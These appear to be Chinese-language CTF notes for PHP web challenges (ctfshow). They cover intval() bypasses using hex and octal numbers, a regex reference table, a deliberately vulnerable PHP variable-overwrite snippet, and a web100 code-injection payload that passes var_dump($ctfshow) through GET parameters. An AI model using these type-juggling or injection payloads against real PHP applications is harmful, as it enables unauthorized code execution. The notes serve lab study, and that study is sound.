01
intval函数
通过数组绕过
02
进制转换or加个空格在前面。
payload
?num= 4476
?num=0x117c
?num=010574
03
| 符号 | 含义 |
|---|---|
| [abc] | A single character: a, b or c |
| [^abc] | Any single character but a, b, or c |
| [a-z] | Any single character in the range a-z |
| [a-zA-Z] | Any single character in the range a-z or A-Z |
| ^ | Start of line |
| $ | End of line |
| \A | Start of string |
| \z | End of string |
| \s | Any whitespace character |
| \S | Any non-whitespace character |
| \d | Any digit |
| \D | Any non-digit |
| \w | Any word character (letter, number, underscore) |
| \W | Any non-word character |
| \b | Any word boundary character |
| (a|b) | a or b |
| a? | Zero or one of a |
| a* | Zero or more of a |
| a+ | One or more of a |
| a{3} | Exactly 3 of a |
| a{3,} | 3 or more of a |
| a{3,6} | Between 3 and 6 of a |
| . | Any single character |
| (…) | Capture everything enclosed |
04
在linux下面表示当前目录是 ./
05
<?php
include("flag.php");
#若存在GET传值,用POST的值覆盖
$_GET?$_GET=&$_POST:'flag';
#flag参数等于flag,就用$_COOKIE进行覆盖。这里让flag参数不等于flag值就好了
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
#存在HTTP_FLAG参数等于flag,就出最终的flag答案
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
?>
06
web100
v
2
(
′
c
t
f
s
h
o
w
′
)
v2('ctfshow')
v2(′ctfshow′)v3,其中v2肯定是命令,v3传分号
v0是三个值相与,v2和v3不传数字和v1数字相与就为1
payload:
?v1=1&v2=var_dump($ctfshow)&v3=;
或者v3直接用内联注释注释掉
?v1=1&v2=var_dump($ctfshow)/*&v3=*/;